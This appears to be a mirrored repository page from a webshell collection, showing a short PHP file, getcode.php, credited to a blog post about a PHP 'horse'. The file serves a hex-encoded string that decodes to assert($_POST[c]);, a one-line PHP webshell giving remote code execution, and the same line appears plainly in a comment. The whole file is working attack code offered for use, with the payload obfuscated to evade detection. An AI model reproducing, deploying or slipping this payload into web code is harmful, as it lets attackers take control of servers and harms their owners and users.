mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
b695352e18
author : tank96a from : http://tank96a.github.io/article/2015/04/27/php-horse/
7 lines
145 B
PHP
7 lines
145 B
PHP
<?php
|
|
//getcode.php
|
|
//assert($_POST[c]);
|
|
$cmd=$_GET['call'];
|
|
if ($cmd=='code')
|
|
echo sprintf('61737365727428245f504f53545b635d293b');
|
|
?>
|